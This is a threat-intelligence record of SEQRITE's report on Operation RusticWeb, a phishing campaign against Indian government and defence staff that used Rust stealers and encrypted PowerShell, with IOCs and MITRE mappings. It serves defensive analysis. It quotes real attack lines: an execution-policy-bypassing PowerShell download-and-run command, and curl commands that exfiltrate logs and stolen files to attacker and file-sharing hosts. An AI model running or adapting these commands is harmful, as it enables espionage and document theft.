{
	"id": "abdba514-88e3-4c12-b5ca-2bde8939f899",
	"created_at": "2026-04-06T00:10:37.59317Z",
	"updated_at": "2026-04-10T13:12:43.601863Z",
	"deleted_at": null,
	"sha1_hash": "9ed5aee4102687b649fd6b8fb7126e98a9872da0",
	"title": "Operation RusticWeb targets Indian Govt: From Rust-based malware to Web-service exfiltration",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3682085,
	"plain_text": "Operation RusticWeb targets Indian Govt: From Rust-based malware to Web-service exfiltration\r\nBy Sathwik Ram Prakki\r\nPublished: 2023-12-21 · Archived: 2026-04-05 20:13:17 UTC\r\nSEQRITE Labs APT-Team has uncovered a phishing campaign targeting various Indian government personnel since October 2023. We have also identified targeting of both government and private entities in the defence sector over December. New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine instead of a dedicated command-and-control (C2) server. While actively modifying its arsenal, the actor has also used fake domains to host malicious payloads and decoy files. Below are a few of the domain names and sample baits used in this campaign:\r\nIPR form of Department of Personnel \u0026 Training, specific to IAS officers\r\nFake domain mimicking Army Welfare Education Society (AWES)\r\nStats report of Assam CDR by Kailash Satyarthi Children’s Foundation\r\nAnother fake domain mimicking Parichay, a Government SSO platform\r\nNomination form for Defence Services Officers Provident (DSOP) Fund\r\nPresentation on the quarterly brief of initiatives with the Ministry of Defence\r\nThis campaign is tracked as Operation RusticWeb, where multiple TTPs overlap with the Pakistan-linked APT groups Transparent Tribe (APT36) and SideCopy. It also has similarities with the Operation Armor Piercer report released by Cisco in 2021, and the targeting with the ESSA scholarship form of AWES was observed by our team back in the same year.\r\nThreat actors have begun moving from well-known compiled languages to newer ones like Golang, Rust, and Nim. This provides cross-platform compatibility and makes detection more difficult at the same time. 
Recent examples of Golang malware analyzed by our team are the Windows-based Warp malware ecosystem, which uses a Telegram bot as C2, and a Linux-based stager payload of Ares RAT. At the same time, various ransomware (RaaS) operators have migrated from Golang to Rust as it provides high-performance encryption and evasion speed while ensuring memory safety.\r\nInfection Chain 1\r\nThe first infection observed relies heavily on Rust-based payloads that are used for enumerating the file system. A malicious shortcut file starts the infection, where a fake domain of AWES is utilized to drop these payloads and exfiltrate data to a file-sharing web service.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 1 of 25\r\nFig. 1 – Infection Chain (1)\r\nThe attacker targets the victim via spear-phishing leading to an archive file named “IPR_2023-24”. This contains a Windows shortcut file masquerading as a PDF file using a double extension format. The comment of the shortcut suggests the bait to be a form related to IPR.\r\nFig. 2 – Malicious Shortcut file\r\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep Bypass -nop -c \"iwr 'hxxps://rb[.]gy/gbfsi' -OutFile $env:USERPROFILE\\Documents\\file.ps1; \u0026 $env:USERPROFILE\\Documents\\file.ps1\"\r\nOpening this triggers PowerShell to download and execute a script from the rb[.]gy domain, a free URL shortener. The command-line parameters bypass the execution policy and skip loading the profile, and the PS1 script is downloaded using Invoke-WebRequest (the iwr alias).\r\nVictimology\r\nBased on the shortened URL, we can check the stats for the number of clicks and the country where each click originated using the shortener's tracker. 
The campaign went live at the end of September and a lot of activity can be seen in October, with 26.53% of the clicks being from India alone. This doesn’t account for confirmed victimology but gives an overview of the targeted victims.\r\nFig. 3 – Victimology\r\nPowerShell Stage\r\nThe expanded URL points to a domain named awesscholarship[.]in to fetch and save the PowerShell script (file.ps1) in the Documents folder. Before checking out this script, note that the domain name looks like a scholarship site for the “Army Welfare Education Society”. The legitimate domain for this organization is scholarship[.]awesindia[.]com, where similar phishing campaigns have been observed in the past. Opening this fake domain page redirects to the official AWES page, which shows an official alert notice as seen below.\r\nFig. 4 – Official notice of fake website\r\nThe PowerShell script begins by setting up URL paths for downloading the subsequent-stage payloads along with the lure document. Target paths for downloading and uploading files are set up, and three functions are defined primarily for those features.\r\nFig. 5 – PowerShell script\r\nThe X and Y functions are used to log messages to a file and to download a file from the given URL to the target path \u0026 log it, respectively. The target location is the default Documents directory, where a new folder named Downloads is created to drop the decoy PDF file, and an archive is dropped beside the folder.\r\nFig. 
6 – PowerShell script (contd.)\r\nOnce the decoy is opened, the archive file is extracted; it contains a single file without any extension. This is renamed to add the EXE extension and executed. Lastly, the Z function is used to upload the log file to the server using the curl command and then delete the recorded logs.\r\nFig. 7 – Log file uploaded\r\nMeanwhile, the decoy file opened is a form for a statement of Immovable Property Return where the service is mentioned as ‘Indian Administrative Service’. Multiple similar forms on various Indian government portals are available in the public domain. However, this blank IPR form is available on the website of DoPT (Department of Personnel \u0026 Training), which falls under India’s Ministry of Personnel, Public Grievances and Pensions. Note that this is in no way related to the ESSA (Education Scholarship Scheme for Army Personnel) application form.\r\nFig. 8 – Decoy: IPR form for IAS officers (Oct’23)\r\nDownloader: System Check Stage\r\nThe EXE payload turns out to be a Rust-compiled binary that checks basic system information, as suggested by the PDB path – ‘syscheck.pdb’. After demangling the Rust function names using an IDA Pro plugin, we can see a lot of write and command-execute functions being called. It retrieves information using:\r\nThe domain ifconfig[.]me to fetch the public IP address\r\nA WMIC command to fetch the active drives present on the victim system – “wmic logicaldisk get caption”.\r\nFig. 
9 – System check logs\r\nThese logs are written into a file named ‘MySystem.txt’ in the ProgramData\\syscheck directory and uploaded to the same domain as:\r\n\"curl -F TT=@C:\\ProgramData\\syscheck\\MySystem.txt hxxps://awesscholarship[.]in/upload/upload.php\"\r\nFig. 10 – URL to download the next stage\r\nThen another archive named file1.zip is downloaded from the same fake domain and extracted. It is renamed to ‘MySystem.exe’ and executed. Lastly, persistence for this final payload is created through the Startup directory.\r\nFig. 11 – Persistence via Startup\r\nStealer: Final Stage\r\nThe final payload is another Rust-based malware that steals files, collects the system name \u0026 IP, and uploads individual files along with the logs. It doesn’t have the built-in features of sophisticated info-stealers, such as stealing from web browsers, Discord/Steam or cryptocurrency wallets. Multiple versions of this stealer were found in this campaign, with compilation timestamps ranging from September till date (December), and they have had a significantly lower detection rate on VirusTotal.\r\nMD5 Compilation Timestamp PDB\r\nda745b60b5ef5b4881c6bc4b7a48d784 2023-09-26 syscheck.pdb\r\nf68b17f1261aaa4460d759d95124fbd4 2023-09-26 alam.pdb\r\n237961bbba6d4aa2e0fae720d4ece439 2023-10-26 alam.pdb\r\nd2949a3c4496cb2b4d204b75e24390d9 2023-12-08 Zew.pdb\r\nfc61b985d8c590860f397d943131bfb5 2023-12-11 Zew.pdb\r\nChanges in the PDB path name can be seen in the October and December samples, but the samples are almost identical when compared via BinDiff, with 91% similarity, except for a few minor changes.\r\nFig. 
12 – Similarity in samples\r\nIt enumerates all document and archive files on all the drives it fetched previously in the downloader stage. Two log files are created inside a new folder under the ProgramData directory, with a different folder name (Micro, File) for each sample. They are used to store records of uploaded files and logs of enumerated files. After saving the enumerated files to ‘Logs.txt’, each file is uploaded via the curl PUT method to the oshi[.]at domain, an anonymous public file-sharing engine called OshiUpload.\r\n\"curl -T C:\\Users\\test\\Downloads\\\u003cfilename\u003e.zip hxxps://oshi[.]at\"\r\nAlong with the desktop name, the links to download these files are saved in ‘Records.txt’, which contains three URLs for each file. Two are clearnet links – one for managing and the other for downloading. The third is a Tor domain of Oshi for downloading via its hidden service.\r\nFig. 13 – Download links of uploaded files\r\nThe management page displays the attributes of the uploaded file – download links, size, type, hash, and timestamp. Options for destroying the file along with an expiration timer are present.\r\nFig. 14 – Management page for uploaded files\r\nThe log files, with timestamps in the filename, are uploaded to the fake AWES domain. The server response is verified for a successful upload, after which the payload goes into an infinite sleep until interrupted.\r\nFig. 15 – Server response after uploading logs\r\nWith the new stealer payloads that we observed in December, the threat actor utilizes a new bait document that belongs to Kailash Satyarthi Children’s Foundation. 
The document is available on their website and is related to their statistics report on “Child Marriage and other crimes against Children in Assam”.\r\nFig. 16 – Decoy: Assam CDR (Dec’23)\r\nUsing decoys themed as children’s foundations or societies for army children and IAS officers in a spear-phishing campaign indicates a targeted effort aimed at Indian government officials, especially those associated with children’s foundations or societies.\r\nInfection Chain 2\r\nAnother similar infection chain was observed in December using maldocs, where enumeration and exfiltration were done using a PowerShell script instead of Rust-based payloads. Along with two fake domains, encrypted PowerShell scripts have been used here.\r\nFig. 17 – Infection Chain (2)\r\nThe infection starts with a phishing maldoc that contains a malicious VBA macro. Behind basic VBA obfuscation, it contains encrypted PowerShell commands. Similar maldocs have been identified that use slightly modified PS commands:\r\n1. Dsop_Nom.ppam\r\n2. DSOP-NOM.ppam\r\n3. PM_INDIG_INITIATIVE_BRIEF.ppam\r\nFig. 18 – Malicious VBA macro\r\nEncrypted PowerShell\r\nOnce the document is opened, the macro converts a sequence of numbers to characters, forming ‘PoWeRSHEll’. The PowerShell command contains encrypted data, which is converted to a SecureString using ‘ConvertTo-SecureString’ with a key. 
This follows a similar approach to the PowerShell decryption seen in Emotet, but with slightly more obfuscation.\r\nFig. 19 – Encrypted and Obfuscated PowerShell commands\r\nIn the first maldoc, the converted SecureString is decrypted through the Marshal class, which manages the unmanaged memory for the decryption via the built-in DPAPI, and the commands are invoked using the SecureStringToGlobalAllocUnicode method. The second one uses the PSCredential object to get a plain-text string. In the final one, PtrToStringBSTR and SecureStringToBSTR are used with the Marshal class. For obfuscation, the commands use techniques from Invoke-Obfuscation to mask the trigger of the IEX command using environment variables:\r\nFig. 20 – Obfuscated IEX command\r\nLooking at the fully decrypted PowerShell commands, they download the decoy file and the next-stage PowerShell script. These are downloaded from the domains into the Downloads and Documents directories respectively and executed.\r\nFig. 21 – Decoded commands (1)\r\nFig. 22 – Decoded commands (2)\r\nDomains and Decoys\r\nThe first scenario downloads from the domain ‘parichay.epar[.]in’, whereas the second one uses the same fake domain of AWES observed in the first infection chain. This is another fake domain used to host malicious payloads, which mimics the official government website ‘parichay.nic[.]in’. It is a Government SSO platform designed to onboard users under a single authentication framework. 
While Parichay authorizes government employees to access various NIC services based on “user department” and the Government email address (@nic.in/@gov.in), Jan Parichay authorizes citizens to access citizen-centric services.\r\nFig. 23 – Legitimate and fake Parichay domains\r\nThe first decoy pertains to the DSOP (Defence Services Officers Provident) Fund nomination form, which is handled by the Defence Accounts Department. The second decoy is related to a presentation on a quarterly brief with the Ministry of Defence.\r\nFig. 24 – Decoy: Defence Services Officers Provident (DSOP) Fund\r\nFig. 25 – Decoy: Ministry of Defence\r\nThe dropped next-stage PowerShell script ‘Mail_check.ps1’ is encrypted and obfuscated similarly. Looking at the decrypted script, it starts by downloading and extracting an archive file, which contains a payload named ‘syscheck.exe’. It is extracted directly to the Startup folder to establish persistence for this payload.\r\nFig. 26 – Dropped PowerShell script after decryption\r\nEnumerate and Exfiltrate\r\nThe binary is another Rust-based payload with a different PDB name, ‘Aplet.pdb’. It has a compiler timestamp of Dec 14 and carries the name of Cisco’s AnyConnect Web Helper along with a signed certificate.\r\nFig. 27 – Binary with WebHelper Certificate\r\nInstead of performing the enumeration \u0026 exfiltration directly, this drops a PowerShell script ‘sys.ps1’ into the Pictures directory for this purpose after fetching the username. 
The command triggered is:\r\n\"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Users\\test\\Pictures\\sys.ps1\"\r\nIt excludes 3 folders during enumeration: Windows and both of the ‘Program Files’ directories. Only 13 file types are shortlisted (‘.ppt’, ‘.pptx’, ‘.pdf’, ‘.xlsx’, ‘.xlsm’, ‘.xls’, ‘.xlam’, ‘.doc’, ‘.docx’, ‘.docm’, ‘.txt’, ‘.dot’, ‘.ppam’), and each matching file is logged to ‘paths.txt’ in the Documents folder.\r\nFig. 28 – Enumeration \u0026 Exfiltration\r\nOnce a file is uploaded to oshi[.]at, the download URLs are saved to ‘suc_logs.txt’, similar to campaign 1. This script runs in an infinite loop to check if any new files have been created. These URL logs are periodically uploaded after a specific duration.\r\nFig. 29 – Uploading logs\r\nMeanwhile, the parent binary (syscheck) goes into an infinite sleep unless interrupted. If it is interrupted, instead of exiting, it uploads the URL logs to Oshi again. Additionally, this time it also uploads them to a sub-domain of firebaseio as a backup measure.\r\nFig. 30 – Uploading to Firebaseio with authentication\r\nThe Firebase Realtime Database is a cloud-hosted NoSQL database that can store and sync data in real time. It is an open platform by Google that is widely used by developers for cloud-based applications and has attracted threat actors, who have deployed malware like Unlucky Kamran to exfiltrate data through it. 
It provides several features like cloud storage, hosting, a real-time database, and more.\r\nConclusion\r\nA new phishing campaign is targeting various Indian government personnel to steal confidential documents. Rust-based payloads and encrypted PowerShell scripts have been deployed to enumerate and exfiltrate documents to an anonymous public file-sharing engine called OshiUpload instead of a dedicated command-and-control (C2) server. Both fake domains, which mimic government entities, have been used to host malicious payloads in this cyber-espionage attack. Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups. As threat actors shift to malware developed using newer compiled languages like Golang, Rust, and Nim, we recommend proceeding with caution and taking the necessary precautions to stay protected.\r\nSEQRITE Protection\r\nLnk.Stealer.48397\r\nPS.Stealer.48398\r\nRustStealer.48408.GC\r\nScript.RustStealer.48409\r\nTrojan.Ruststealer\r\nMITRE ATT\u0026CK\r\nTactic | Technique ID | Name\r\nResource Development | T1583.001 | Acquire Infrastructure: Domains\r\nResource Development | T1587.001 | Develop Capabilities: Malware\r\nResource Development | T1588.002 | Obtain Capabilities: Tool\r\nResource Development | T1608.001 | Stage Capabilities: Upload Malware\r\nResource Development | T1608.005 | Stage Capabilities: Link Target\r\nInitial Access | T1566.002 | Phishing: Spearphishing Link\r\nExecution | T1106 | Native API\r\nExecution | T1129 | Shared Modules\r\nExecution | T1059 | Command and Scripting Interpreter\r\nExecution | T1047 | Windows Management Instrumentation\r\nExecution | T1204.002 | User Execution: Malicious File\r\nPersistence | T1547.001 | Registry Run Keys / Startup Folder\r\nDefense Evasion | T1027.010 | Command Obfuscation\r\nDefense Evasion | T1036.007 | Masquerading: Double File Extension\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information\r\nDiscovery | T1016 | System Network Configuration Discovery\r\nDiscovery | T1033 | System Owner/User Discovery\r\nDiscovery | T1083 | File and Directory Discovery\r\nCollection | T1005 | Data from Local System\r\nCollection | T1119 | Automated Collection\r\nCommand and Control | T1105 | Ingress Tool Transfer\r\nExfiltration | T1020 | Automated Exfiltration\r\nExfiltration | T1567 | Exfiltration Over Web Service\r\nIOCs\r\nMD5 | Filename\r\n56cb95b63162d0dfceb30100ded1131a | IPR_2023-24.pdf.zip\r\n13ee4bd10f05ee0499e18de68b3ea4d5 | IPR_2023-24.pdf.lnk\r\nde30abf093bd4dfe6b660079751951c6 | DSOP-NOM.ppam\r\nPowerShell\r\nc9969ece7bb47efac4b3b04cdc1538e5 | in.ps1\r\nf14e778f4d22df275c817ac3014873dc | In.ps1\r\n501a6d48fd8f80a134cf71db3804cf95 | Mail_check.ps1\r\n6d29fc0a73096433ff9449c4bbc4cccc | sys.ps1\r\nDecoys\r\na9182c812c7f7d3e505677a57c8a353b | Ipr.pdf\r\nf5d8664cbf4a9e154d4a888e4384cb1d | abc009.pdf\r\n3ce8dfb3f1bff805cb6b85a9e950b3a2 | 1.pdf\r\na696c50dd5d15ba75c9e7f8d3c64997c | 1.pdf\r\nArchive\r\ne0102071722a87f119b12434ae651b48\r\nee8d767069faf558886f1163a92e4009\r\n9f3359ae571c247a8be28c0684678304\r\nb0b6629d35451bcc511c0f2845934c3e\r\nf2501e8b57486c427579eeda20b729fd\r\n20b4eb5787faa00474f7d27c0fea1e4b\r\n635864ff270cf8e366a7747fb5996766\r\nEXE\r\nda745b60b5ef5b4881c6bc4b7a48d784\r\nf68b17f1261aaa4460d759d95124fbd4\r\n237961bbba6d4aa2e0fae720d4ece439\r\nd2949a3c4496cb2b4d204b75e24390d9\r\nfc61b985d8c590860f397d943131bfb5\r\n04557782d7017f18ec059fc96d7f2dc8\r\nDomain/IP\r\nawesscholarship[.]in\r\n89.117.188[.]126\r\nparichay.epar[.]in\r\n13.232.102[.]189\r\noshi[.]at\r\nalfa-aeafa-default-rtdb.firebaseio[.]com\r\nURLs\r\nhxxps://rb[.]gy/gbfsi\r\nhxxps://awesscholarship[.]in/upload/file.zip\r\nhxxps://awesscholarship[.]in/upload/file1.zip\r\nhxxps://awesscholarship[.]in/upload/in.ps1\r\nhxxps://awesscholarship[.]in/upload/upload.php\r\nhxxps://awesscholarship[.]in/upload/Ipr.pdf\r\nhxxps://awesscholarship[.]in/upload/abc009.pdf\r\nhxxps://awesscholarship[.]in/upload/1.pdf\r\nhxxps://awesscholarship[.]in/upload/DSOP-NOM.zip\r\nhxxps://awesscholarship[.]in/ppam/Mail_Check.ps1\r\nhxxps://awesscholarship[.]in/ppam/syscheck.zip\r\nhxxps://parichay.epar[.]in/Win/1.pdf\r\nhxxps://parichay.epar[.]in/Win/Mail_Check.ps1\r\nPDB\r\nC:\\Users\\123\\Desktop\\Syscheck\\target\\release\\deps\\syscheck.pdb\r\nC:\\Users\\123\\Desktop\\Alam\\target\\release\\deps\\alam.pdb\r\nC:\\Users\\123\\Desktop\\Aplet\\target\\release\\deps\\Aplet.pdb\r\nD:\\HOME\\DESKTOP NEW DATA\\Zew\\target\\release\\deps\\Zew.pdb\r\nHost\r\nC:\\ProgramData\\syscheck\\file.zip\r\nC:\\ProgramData\\syscheck\\MySystem.exe\r\nC:\\ProgramData\\syscheck\\MySystem.txt\r\nC:\\ProgramData\\Micro\\logs.txt\r\nC:\\ProgramData\\Micro\\records.txt\r\nC:\\ProgramData\\Files\\Log.txt\r\nC:\\ProgramData\\Files\\Records.txt\r\nDocuments\\downloadAndExecuteLog.txt\r\nDocuments\\file.ps1\r\nDocuments\\myfile.zip\r\nDocuments\\unzippedFolder\\file.exe\r\nDocuments\\Downloads\\myfile.pdf\r\nDocuments\\paths.txt\r\nDocuments\\suc_logs.txt\r\nDocuments\\Mail_Check.ps1\r\nDocuments\\syscheck.zip\r\nDownloads\\1.pdf\r\nPictures\\sys.ps1\r\n%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MySystem.exe\r\n%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\syscheck.exe\r\nAuthor: Sathwik Ram Prakki\r\nSource: 
https://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/"
	],
	"report_names": [
		"operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "403c7091-ccdd-4a76-94ad-27eb61449336",
			"created_at": "2024-01-18T02:02:34.407633Z",
			"updated_at": "2026-04-10T02:00:04.829369Z",
			"deleted_at": null,
			"main_name": "Operation RusticWeb",
			"aliases": [],
			"source_name": "ETDA:Operation RusticWeb",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b01b0683-5c7c-4070-ba0c-4fdede370995",
			"created_at": "2022-10-25T16:07:23.925692Z",
			"updated_at": "2026-04-10T02:00:04.79318Z",
			"deleted_at": null,
			"main_name": "Operation Armor Piercer",
			"aliases": [],
			"source_name": "ETDA:Operation Armor Piercer",
			"tools": [
				"NetWeird",
				"NetWire",
				"NetWire RAT",
				"NetWire RC",
				"NetWired RC",
				"Recam",
				"Warzone",
				"Warzone RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434237,
	"ts_updated_at": 1775826763,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ed5aee4102687b649fd6b8fb7126e98a9872da0.pdf",
		"text": "https://archive.orkl.eu/9ed5aee4102687b649fd6b8fb7126e98a9872da0.txt",
		"img": "https://archive.orkl.eu/9ed5aee4102687b649fd6b8fb7126e98a9872da0.jpg"
	}
}